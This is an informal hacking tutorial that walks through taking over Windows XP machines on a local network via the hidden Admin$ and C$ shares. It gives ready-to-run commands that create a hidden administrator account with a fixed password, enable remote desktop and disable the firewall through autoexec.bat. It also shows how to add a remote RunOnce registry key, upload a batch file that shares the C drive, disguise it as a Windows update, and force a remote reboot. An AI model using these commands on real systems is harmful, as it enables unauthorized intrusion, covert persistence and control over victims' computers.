So want a quick and easy way to hack a windows machine on a network youre on? This attack is pretty easy, and works pretty frequently. It involved connecting to a hidden share, uploading a logic bomb, and whola instant access. First thing to know is that Windows XP makes file sharing pretty easy. You can just right click on a folder or drive, and go to sharing and set it up. However what a lot of people dont know is that Windows installs come with secret shares that are used for applications and Windows networking and such. The default secret shares are:
IPC$
Admin$
and some have a
C$
The money sign after them as you may have guessed means they are secret, unseen by normal windows browsing. The IPC share isnt of much interest to us right now. It is used for other things beyond file sharing. Try it quick, go into the run box in the start menu, type in
\\IP\admin$
\\IP\C$
Just replace IP with the IP address of some computer on your network. There is a good chance youll be able to access files. If you can access the C$ drive thats awesome, if not, there is another workaround we have to do which Ill cover later. If you can access the C$ keep reading, if you cannot, skip to the bottom part and read that.

I Can Access the C$ Share
------------------------------------------------------------------------

Okay, so you are able to access the C$ share. Then this is a piece of cake. First you need to create a new batch file, a batch file is just a compilation of DOS commands into an executable file. To make one you just open up notepad and start typing commands and save it as a .bat file. Good news, you dont need to even write a batch file for this, you can just edit one that already exists called autoexec.bat. This is a file that runs every time Windows starts up. Normally, it is empty, but we are going to add a few lines to it. Autoexec.bat is what is called super hidden, meaning it uses the windows system attribute, and the windows hidden attribute. So, to see the file, you need to go into a folder, any folder at all, go to the top menu and select tools, then go to folder options. From there click the view tab, and scroll down till you find the option
Hide protected operating system files (recommended)
Make sure to Uncheck that. Now you should be able to see the autoexec.bat file. To open it up, just right click on it, and click edit. Add the following lines to it.

net user MS_Server_Consol MSServer01 /add
net group administrators MS_Server_Consol /add
reg ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SpecialAccounts\UserList" /v MS_Server_Consol /t REG_DWORD /d 0 /f
reg ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh firewall set opmode mode=DISABLE

Then save it, and wait for that computer to get restarted, or if you have the ability, restart it yourself. What those commands are going to do, is create an account called MS_Server_Consol with a password of MSServer01, make it an administrator, make that account not visible in the user login list so nobody gets suspicious, turns on remote desktop so we can take total control of the machine later, and turns off the windows firewall so remote desktop will work without having to worry about the firewall being on.
Once the machine is restarted, you basically own the box. You have a local admin account with remote desktop on, and nobody should be the wiser. I would then remove the lines from autoexec.bat now that the damage is done. There are a few cases when this will not work.
- If the C$ is not shared
- If you are on a Windows Domain
- If another firewall is blocking your editing of autoexec.bat
- If there is other security in place blocking our attempts.

Although it may seem like this approach would fail a lot, it actually succeeds more than it fails. Also, the person may have outright shared their C drive, you may not need the secret share, so you can try that to.

I Cant Access the C$ Share
------------------------------------------------------------------------

So what is the C drive is not shared? Dont worry we have another trick up our sleeve. This one gets a little more complex, and deals with some remote registry hacks. So unless you are experienced, dont try this one out. Our outline of attack as is follows.

- Write a remote registry key to the startup registry that will run a custom made bat file.
- Write a bat file that shares the C drive.
- Upload the bat file to the admin share of the remote machine.
- Wait for, or force the remote machine to restart.
-
Okay, so step 1, we need to write a registry key to the remote computer that will run a bat file of our choosing. The basic outline of the command should be this.

reg add [IP]\HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE" /v Runbat /t REG_SZ /d C:\WINDOWS\ShareC.bat

This command all goes on one line in a DOS prompt. Replace [IP] with the name or IP address of the victim machine. Hopefully the command runs, if not, you are shit out of luck (at least for this article, there are a few other ways I think but none I feel like covering here). Okay, now we write a batch file, that has the following line.

@echo off
net Share c$=c:

Save that as ShareC.bat and write it to the root of the admin$ share on the remote machine. Once again, we need to wait for the machine to be rebooted somehow. This should share the C drive under the C$ share, and you can follow the steps above. Keep in mind this may raise some suspicion, because a DOS box is going to pop up the next time the person runs the computer, hopefully they just write it off as something odd. You could also add a line like:

ECHO Updating Windows&..

To the end of the end of the above batch, that will display the text Updating Windows to the person in the DOS prompt, so hopefully they might just ignore it. Now the C drive is shared and you can follow the directions for the C$ shared. Keep in mind this is just a basic walkthrough, you may have to adjust your attack some to make it work for the current network environment, but it should work for a lot of home networks, and some small business networks.

Oh also one command you can try to force the remote machine to shutdown and restart is

shutdown -r -m \\127.0.0.1 -t 1

With any luck, that will force the remote machine to restart RIGHT NOW! Make sure nobody is logged on. The last number adjusts the number of seconds until shutdown. So you can give that a whirl. Good luck, remember to think things through if they arent working, and use your own knowledge to adapt the attack as needed.